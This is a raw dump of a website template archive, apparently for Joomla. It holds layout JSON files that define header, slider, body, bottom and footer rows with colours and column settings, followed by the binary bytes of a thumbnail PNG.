Object]","column_type":0,"name":"logo","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-10","xs_col":"col-xs-9","custom_class":"","xs_hidden":0,"ms_hidden":0,"md_hidden":0}},{"type":"sp_col","className":"layout-column col-sm-8","settings":{"sortableitem":"[object Object]","column_type":0,"name":"menu","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-1","xs_col":"col-xs-1","custom_class":"","xs_hidden":0,"ms_hidden":0,"md_hidden":0}},{"type":"sp_col","className":"layout-column col-sm-1","settings":{"sortableitem":"[object Object]","column_type":0,"name":"topsearch","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-1","xs_col":"col-xs-1","custom_class":"no-gutter"}}]},{"type":"row","layout":12,"settings":{"name":"Slider","background_color":"","color":"","background_image":"","link_color":"","link_hover_color":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"","margin":"","fluidrow":1,"custom_class":""},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"column_type":0,"name":"slider","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"","xs_col":"","custom_class":""}}]},{"type":"row","layout":12,"settings":{"background_repeat":"no-repeat","custom_class":"","fluidrow":1,"margin":"","padding":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"link_hover_color":"","link_color":"","background_size":"cover","background_image":"","color":"","background_color":"","name":"Title","background_position":"100% 50%"},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"column_type":0,"name":"title","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"","xs_col":"","custom_class":""}}]},{"type":"row","layout":"363","settings":{"custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"link_hover_color":"","link_color":"","text_color":"","bg_image":"","bg_color":"","name":"Main Body","background_color":"","color":"","background_image":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"","margin":"","fluidrow":1},"attr":[{"type":"sp_col","className":"layout-column col-sm-3","settings":{"xs_col":"","sm_col":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"column_type":0,"name":"left","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":"","sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-6","settings":{"column_type":1,"name":"","custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"xs_col":"","sm_col":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"name":"right","column_type":0,"sortableitem":"[object Object]"}}]},{"type":"row","layout":"3333","settings":{"name":"Bottom","background_color":"#f5f5f5","color":"","background_image":"","link_color":"","link_hover_color":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"100px 0px","margin":"","fluidrow":0,"custom_class":""},"attr":[{"type":"sp_col","className":"layout-column col-sm-3","settings":{"column_type":0,"name":"bottom1","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-6","xs_col":"","custom_class":"","sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"custom_class":"","xs_col":"","sm_col":"col-sm-6","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"bottom2","column_type":0}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"custom_class":"","xs_col":"","sm_col":"col-sm-6","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"bottom3","column_type":0}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"custom_class":"","xs_col":"","sm_col":"col-sm-6","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"bottom4","column_type":0}}]},{"type":"row","layout":12,"settings":{"custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"link_hover_color":"#f0f0f0","link_color":"#d6d6d6","text_color":"","bg_image":"","bg_color":"","name":"Footer","background_color":"#363839","color":"#b0b0b0","background_image":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"","margin":"","fluidrow":0},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"xs_col":"","sm_col":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"column_type":0,"name":"footer1","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":"","sortableitem":"[object Object]"}}]}]PK!��!flex/layout/flex-full-window.jsonnu&1i�[{"type":"row","layout":"291","settings":{"name":"Header","background_color":"","color":"#ffffff","background_image":"","background_repeat":"repeat","background_size":"cover","link_color":"#ffffff","link_hover_color":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"","margin":"","fluidrow":0,"custom_class":"sticky-top"},"attr":[{"type":"sp_col","className":"layout-column col-sm-2 column-active","settings":{"sortableitem":"[object Object]","column_type":0,"name":"logo","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-9","xs_col":"col-xs-9","custom_class":"","xs_hidden":0,"ms_hidden":0,"md_hidden":0}},{"type":"sp_col","className":"layout-column col-sm-9","settings":{"sortableitem":"[object Object]","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":"","xs_col":"col-xs-1","sm_col":"col-sm-1","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"menu","column_type":0}},{"type":"sp_col","className":"layout-column col-sm-1","settings":{"sortableitem":"[object Object]","custom_class":"","xs_col":"col-xs-1","sm_col":"col-sm-1","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"topsearch","column_type":0}}]},{"type":"row","layout":12,"settings":{"custom_class":"","fluidrow":1,"margin":"","padding":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"link_hover_color":"","link_color":"","background_image":"","color":"","background_color":"","name":"Slider"},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"custom_class":"","xs_col":"","sm_col":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"slider","column_type":0}}]},{"type":"row","layout":12,"settings":{"background_position":"100% 50%","name":"Title","background_color":"","color":"","background_image":"","background_size":"cover","link_color":"","link_hover_color":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"","margin":"","fluidrow":1,"custom_class":"","background_repeat":"no-repeat"},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"custom_class":"","xs_col":"","sm_col":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"title","column_type":0}}]},{"type":"row","layout":"363","settings":{"fluidrow":1,"margin":"","padding":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"background_image":"","color":"","background_color":"","name":"Main Body","bg_color":"","bg_image":"","text_color":"","link_color":"","link_hover_color":"","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":""},"attr":[{"type":"sp_col","className":"layout-column col-sm-3","settings":{"sortableitem":"[object Object]","custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"name":"left","column_type":0,"hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"","xs_col":""}},{"type":"sp_col","className":"layout-column col-sm-6","settings":{"sortableitem":"[object Object]","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":"","name":"","column_type":1}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"sortableitem":"[object Object]","column_type":0,"name":"right","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"","xs_col":""}}]},{"type":"row","layout":"3333","settings":{"custom_class":"","fluidrow":0,"margin":"","padding":"100px 0px","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"link_hover_color":"","link_color":"","background_image":"","color":"","background_color":"#f5f5f5","name":"Bottom"},"attr":[{"type":"sp_col","className":"layout-column col-sm-3","settings":{"sortableitem":"[object Object]","custom_class":"","xs_col":"","sm_col":"col-sm-6","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"bottom1","column_type":0}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"column_type":0,"name":"bottom2","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-6","xs_col":"","custom_class":""}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"column_type":0,"name":"bottom3","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-6","xs_col":"","custom_class":""}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"column_type":0,"name":"bottom4","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-6","xs_col":"","custom_class":""}}]},{"type":"row","layout":12,"settings":{"fluidrow":0,"margin":"","padding":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"background_image":"","color":"#ffffff","background_color":"","name":"Footer","bg_color":"","bg_image":"","text_color":"","link_color":"#dedede","link_hover_color":"#ffffff","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":"black_bckg-20 sticky-bottom"},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"sortableitem":"[object Object]","custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"name":"footer1","column_type":0,"hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"","xs_col":""}}]}]PK!r���� flex/layout/header-centered.jsonnu&1i�[{"type":"row","layout":12,"settings":{"name":"Logo Centered","background_color":"#3b3b3b","color":"#f0f0f0","background_image":"images/svg/section-background-stripes-gentle.svg","background_repeat":"repeat","link_color":"#e0e0e0","link_hover_color":"#ffffff","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"","margin":"","fluidrow":0,"custom_class":"centered"},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"md_hidden":0,"ms_hidden":0,"xs_hidden":0,"sortableitem":"[object Object]","custom_class":"centered","xs_col":"","sm_col":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"logo","column_type":0}}]},{"type":"row","layout":"111","settings":{"custom_class":"centered","fluidrow":0,"margin":"","padding":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"link_hover_color":"#ffffff","link_color":"#d9d9d9","background_image":"","color":"#d9d9d9","background_color":"#303030","name":"Header"},"attr":[{"type":"sp_col","className":"layout-column col-sm-11 column-active","settings":{"column_type":0,"name":"menu","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-1","xs_col":"col-xs-1","custom_class":"centered","sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-1","settings":{"column_type":0,"name":"topsearch","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-1","xs_col":"col-xs-1","custom_class":"","sortableitem":"[object Object]"}}]},{"type":"row","layout":12,"settings":{"custom_class":"","fluidrow":1,"margin":"","padding":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"link_hover_color":"","link_color":"","background_image":"","color":"","background_color":"","name":"Slider"},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"custom_class":"","xs_col":"","sm_col":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"slider","column_type":0}}]},{"type":"row","layout":12,"settings":{"name":"Page Title","background_color":"#a8a8a8","color":"","background_image":"","link_color":"","link_hover_color":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"","margin":"","fluidrow":1,"custom_class":""},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"column_type":0,"name":"title","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"","xs_col":"","custom_class":""}}]},{"type":"row","layout":"363","settings":{"name":"Main Body","bg_color":"","bg_image":"","text_color":"","link_color":"","link_hover_color":"","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":""},"attr":[{"type":"sp_col","className":"layout-column col-sm-3","settings":{"sortableitem":"[object Object]","custom_class":"custom-class","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"name":"left","column_type":0}},{"type":"sp_col","className":"layout-column col-sm-6","settings":{"sortableitem":"[object Object]","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":"","name":"","column_type":1}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"sortableitem":"[object Object]","column_type":0,"name":"right","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":"class2"}}]},{"type":"row","layout":"3333","settings":{"custom_class":"","fluidrow":0,"margin":"","padding":"100px 0px","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"link_hover_color":"","link_color":"","background_image":"","color":"","background_color":"#f5f5f5","name":"Bottom"},"attr":[{"type":"sp_col","className":"layout-column col-sm-3","settings":{"sortableitem":"[object Object]","custom_class":"","xs_col":"","sm_col":"col-sm-6","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"bottom1","column_type":0}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"column_type":0,"name":"bottom2","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-6","xs_col":"","custom_class":""}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"column_type":0,"name":"bottom3","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-6","xs_col":"","custom_class":""}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"column_type":0,"name":"bottom4","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-6","xs_col":"","custom_class":""}}]},{"type":"row","layout":12,"settings":{"fluidrow":0,"margin":"","padding":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"background_image":"","color":"#9c9c9c","background_color":"#363839","name":"Footer","bg_color":"","bg_image":"","text_color":"","link_color":"#bdbdbd","link_hover_color":"#ff7a7a","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":""},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"sortableitem":"[object Object]","custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"name":"footer1","column_type":0,"hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"","xs_col":""}}]}]PK!��W&& flex/layout/header-addspace.jsonnu&1i�[{"type":"row","layout":"48","settings":{"name":"Top Bar","background_color":"#3d3d3d","color":"#dedede","background_image":"","background_repeat":"no-repeat","background_size":"cover","background_attachment":"fixed","background_position":"0 0","link_color":"#969696","link_hover_color":"#c7c7c7","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"","margin":"","fluidrow":0,"custom_class":"","bg_position":"contain","bg_img_size":"cover","bg_repeat":"no-repeat","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"text_color":"#ffffff","bg_image":"images/powered_by.png","bg_color":"#f02222"},"attr":[{"type":"sp_col","className":"layout-column col-sm-4","settings":{"sortableitem":"[object Object]","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"custom_class":"","name":"top1","column_type":0,"hidden_xs":1,"hidden_sm":1,"hidden_md":0,"sm_col":"","xs_col":""}},{"type":"sp_col","className":"layout-column col-sm-8","settings":{"sortableitem":"[object Object]","custom_class":"pull-right","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"name":"top2","column_type":0,"hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-10","xs_col":"col-xs-10"}}]},{"type":"row","layout":"39","settings":{"custom_class":"","fluidrow":0,"margin":"","padding":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"link_hover_color":"#ffffff","link_color":"#e0e0e0","background_image":"","color":"#f0f0f0","background_color":"#292929","name":"Addspace Logo","background_repeat":"repeat","background_size":"cover"},"attr":[{"type":"sp_col","className":"layout-column col-sm-3","settings":{"xs_hidden":0,"ms_hidden":0,"md_hidden":0,"sortableitem":"[object Object]","custom_class":"","xs_col":"","sm_col":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"logo","column_type":0}},{"type":"sp_col","className":"layout-column col-sm-9","settings":{"column_type":0,"name":"addspace","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"","xs_col":"","custom_class":"centered","sortableitem":"[object Object]"}}]},{"type":"row","layout":"111","settings":{"background_repeat":"repeat","name":"Header","background_color":"#3b3b3b","color":"#e0e0e0","background_image":"","link_color":"#e0e0e0","link_hover_color":"#ffffff","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"","margin":"","fluidrow":0,"custom_class":"addspace"},"attr":[{"type":"sp_col","className":"layout-column col-sm-11","settings":{"column_type":0,"name":"menu","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-1","xs_col":"col-xs-1","custom_class":"","sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-1 column-active","settings":{"custom_class":"","xs_col":"col-xs-1","sm_col":"col-sm-1","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"topsearch","column_type":0,"sortableitem":"[object Object]"}}]},{"type":"row","layout":12,"settings":{"name":"Slider","background_color":"","color":"","background_image":"","link_color":"","link_hover_color":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"","margin":"","fluidrow":1,"custom_class":""},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"column_type":0,"name":"slider","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"","xs_col":"","custom_class":""}}]},{"type":"row","layout":12,"settings":{"custom_class":"","fluidrow":1,"margin":"","padding":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"link_hover_color":"","link_color":"","background_image":"","color":"","background_color":"#a8a8a8","name":"Page Title"},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"custom_class":"","xs_col":"","sm_col":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"title","column_type":0}}]},{"type":"row","layout":"363","settings":{"custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"link_hover_color":"","link_color":"","text_color":"","bg_image":"","bg_color":"","name":"Main Body"},"attr":[{"type":"sp_col","className":"layout-column col-sm-3","settings":{"column_type":0,"name":"left","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":"custom-class","sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-6","settings":{"column_type":1,"name":"","custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"custom_class":"class2","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"name":"right","column_type":0,"sortableitem":"[object Object]"}}]},{"type":"row","layout":"3333","settings":{"name":"Bottom","background_color":"#f5f5f5","color":"","background_image":"","link_color":"","link_hover_color":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"100px 0px","margin":"","fluidrow":0,"custom_class":""},"attr":[{"type":"sp_col","className":"layout-column col-sm-3","settings":{"column_type":0,"name":"bottom1","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-6","xs_col":"","custom_class":"","sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"custom_class":"","xs_col":"","sm_col":"col-sm-6","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"bottom2","column_type":0}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"custom_class":"","xs_col":"","sm_col":"col-sm-6","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"bottom3","column_type":0}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"custom_class":"","xs_col":"","sm_col":"col-sm-6","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"bottom4","column_type":0}}]},{"type":"row","layout":12,"settings":{"fluidrow":0,"margin":"","padding":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"background_image":"","color":"#8f8f8f","background_color":"#363839","custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"link_hover_color":"#ff7070","link_color":"#a3a3a3","text_color":"","bg_image":"","bg_color":"","name":"Footer"},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"xs_col":"","sm_col":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"column_type":0,"name":"footer1","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":"","sortableitem":"[object Object]"}}]}]PK!}U�,,flex/layout/flex-onepage.jsonnu&1i�[{"type":"row","layout":"48","settings":{"bg_position":"contain","bg_img_size":"cover","bg_repeat":"no-repeat","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"text_color":"#ffffff","bg_image":"images/powered_by.png","bg_color":"#f02222","custom_class":"","fluidrow":0,"margin":"","padding":"3px","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"link_hover_color":"#404040","link_color":"#737373","background_position":"50% 50%","background_attachment":"inherit","background_size":"inherit","background_repeat":"repeat","background_image":"","color":"#595959","background_color":"","name":"Top Bar"},"attr":[{"type":"sp_col","className":"layout-column col-sm-4","settings":{"xs_hidden":0,"ms_hidden":0,"md_hidden":0,"sortableitem":"[object Object]","custom_class":"","name":"top1","column_type":0}},{"type":"sp_col","className":"layout-column col-sm-8","settings":{"column_type":0,"name":"top2","custom_class":"","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"sortableitem":"[object Object]","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"","xs_col":""}}]},{"type":"row","layout":"291","settings":{"custom_class":"onepage white transparent-white","fluidrow":0,"margin":"","padding":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"link_hover_color":"","link_color":"","background_size":"inherit","background_repeat":"repeat","background_image":"","color":"","background_color":"","name":"Header"},"attr":[{"type":"sp_col","className":"layout-column col-sm-2","settings":{"md_hidden":0,"ms_hidden":0,"xs_hidden":0,"custom_class":"","xs_col":"col-xs-9","sm_col":"col-sm-10","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"logo","column_type":0,"sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-9","settings":{"column_type":0,"name":"menu","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-1","xs_col":"col-xs-1","custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-1 column-active","settings":{"column_type":0,"name":"topsearch","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-1","xs_col":"col-xs-1","custom_class":"no-gutter","sortableitem":"[object Object]"}}]},{"type":"row","layout":12,"settings":{"name":"Slider","background_color":"","color":"","background_image":"","link_color":"","link_hover_color":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"","margin":"","fluidrow":1,"custom_class":""},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"column_type":0,"name":"slider","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"","xs_col":"","custom_class":""}}]},{"type":"row","layout":12,"settings":{"background_repeat":"no-repeat","custom_class":"","fluidrow":1,"margin":"","padding":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"link_hover_color":"","link_color":"","background_size":"cover","background_image":"","color":"","background_color":"","name":"Title","background_position":"100% 50%"},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"column_type":0,"name":"title","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"","xs_col":"","custom_class":""}}]},{"type":"row","layout":"363","settings":{"custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"link_hover_color":"","link_color":"","text_color":"","bg_image":"","bg_color":"","name":"Main Body","background_color":"","color":"","background_image":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"","margin":"","fluidrow":1},"attr":[{"type":"sp_col","className":"layout-column col-sm-3","settings":{"xs_col":"","sm_col":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"column_type":0,"name":"left","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":"","sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-6","settings":{"column_type":1,"name":"","custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"xs_col":"","sm_col":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"name":"right","column_type":0,"sortableitem":"[object Object]"}}]},{"type":"row","layout":"3333","settings":{"name":"Bottom","background_color":"#f5f5f5","color":"","background_image":"","link_color":"","link_hover_color":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"100px 0px","margin":"","fluidrow":0,"custom_class":""},"attr":[{"type":"sp_col","className":"layout-column col-sm-3","settings":{"column_type":0,"name":"bottom1","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"sm_col":"col-sm-6","xs_col":"","custom_class":"","sortableitem":"[object Object]"}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"custom_class":"","xs_col":"","sm_col":"col-sm-6","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"bottom2","column_type":0}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"custom_class":"","xs_col":"","sm_col":"col-sm-6","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"bottom3","column_type":0}},{"type":"sp_col","className":"layout-column col-sm-3","settings":{"custom_class":"","xs_col":"","sm_col":"col-sm-6","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"name":"bottom4","column_type":0}}]},{"type":"row","layout":12,"settings":{"custom_class":"","md_hidden":0,"ms_hidden":0,"xs_hidden":0,"link_hover_color":"#f0f0f0","link_color":"#d6d6d6","text_color":"","bg_image":"","bg_color":"","name":"Footer","background_color":"#363839","color":"#b0b0b0","background_image":"","hidden_xs":0,"hidden_sm":0,"hidden_md":0,"padding":"","margin":"","fluidrow":0},"attr":[{"type":"sp_col","className":"layout-column col-sm-12","settings":{"xs_col":"","sm_col":"","hidden_md":0,"hidden_sm":0,"hidden_xs":0,"column_type":0,"name":"footer1","xs_hidden":0,"ms_hidden":0,"md_hidden":0,"custom_class":"","sortableitem":"[object Object]"}}]}]PK!M�P[r[rflex/template_thumbnail.pngnu&1i��PNG


IHDR�,�i�gAMA���asRGB���lPLTE������\XUDBBNMLv�����Yt����,,+gdd'Ib7::ҧ�wtEf}����L25J����ʩ���&2?Xl�oCD94����$���n?)`Hi���:}M��� IDATx��}�v�$~
`c�1���ǕJR?l�d��{v��1d2I�K%����as8:vt�� ��ǡ�ʑ��N緃�����|������6i��?<>>������jH��k�*M�ne�v�w|�F���79�L|3��6:�Ek��;��Ct�oܮ��B�Hxt�B`@Ʊ�l����n��߸) ��������}
Ձ~�C:T�$IU��luL��p� ��m�4�D0�:�k�a
��C9㯕�C1�a�)Eh����F�D���0cKL��(b�,3�C�@��!���7&HZ����0B\����g����p�Hr',d��|(J�P>�Cx�cH�l}ő�Qd@�`��1�?��8�&-������3$�	Ay͏��1��"kUm*��@&�$r~͐a�mF��G�W�);t���4k}_�r�����C/�0d�6������!0d�М�o�1�H�I�D���|���%'��ԛ��h�f��%�#"�I�I��!@������z+�j��~�7*?1Z)1�m֔��e���(ϐ���HC��?��Q���8 )��b�`��������ԏ
B�p����
쫃 4�?B$m2B�C3fO�ID�43g��r�D����K9�(6U��a S�`G�!i3g��p�����dAn/=,o����yw��JǠ
���K@��>ˋHї�U����É:�v^��]v��n��H�F�9IC��~!#��;�������u�G�`�WA�a��V�Q��\�1dC��8
_�ED63D�d�@�!?
?
����)�������%��)&I�~��#�X�)A�.�P�ܽ�©$���3 �&t�6ʑ��Đ�2����Sg�Z��|8�Dn��A�W))���1@C�|H��rt"p(�	$S�$��K�)f�L���ϲ's�V:`���s�(�!�K���d�C3���Ԙ-��m�����j�7p�|0-*vu7@�Ń!��<Q�$Cn
���6���T��*����-4W
5Lb��I�u/,��׊���q�(�dH��Pټ�$~�אC�C`��$�6E�0�A�F,���VC��%z(���g�&�	FCC�-�s�h��I_��z���Ph1I���2M��l�‹�709�`Ih�;Ԑ��抇� �n�k�V�=�d�"a��q�N�15[գĉ�s�w}��Ȉ>��ߝ�%�a�r��8	�Q($1G&�HV�a�el��c�p71B?e�����x@�(tTr$7�An1���ٚS$��	�,�w��Z8����,0�ek�V�D������ƕ�833YiMYfH�a�Bf�O'!�cQ�'�|l��F$���]�yJ"[��"3?��!�8�nNo~E��]�S����"W�f�dCpu9BG�����l̿�|h"?,x������`�&K�sf;��MSA��C��@C���>:Uw2q��9�5Ѩ|Z�W`'֪!r��]u���+�V��E�nQTu3�!K��U
��А�kK�b��#)�B�Cݬ`�Ȼb������[��j��Q�$CV& �0y0b�7Db	Yr{՛][�v������@��[�?XA�ANQ@�IZ��!��T�Xȷ�9L4�!��tB	��Y�a�Tv"�ZI�p~��B�-�(��,��ԿB�,I`����'@��Ú�4
���M�tN����#&�!���+@桤1���7�v�hH�����^n΀0���)�1$����-�M��zY�y��Ém���F�C
���SkA�	5Ŀ����9��!�( 0Y�/�@jW��|������N��ي﫶k��[��r���
rWJ0���G��ԉ\�~&$��E�l�ժ�Գ���b���"vpl>h�����8���>I�ݜ!l���B�ϲ��@=�b�H$��H|-�AJqV�P�n2�!:!�_eH�>VUo��TC��Eh��
?�D�]��!�ƾ�&��!�nC��]4'�^5O��J����ҰŒ����U� h��n�	�3���I�ɇ��ě�cy0P
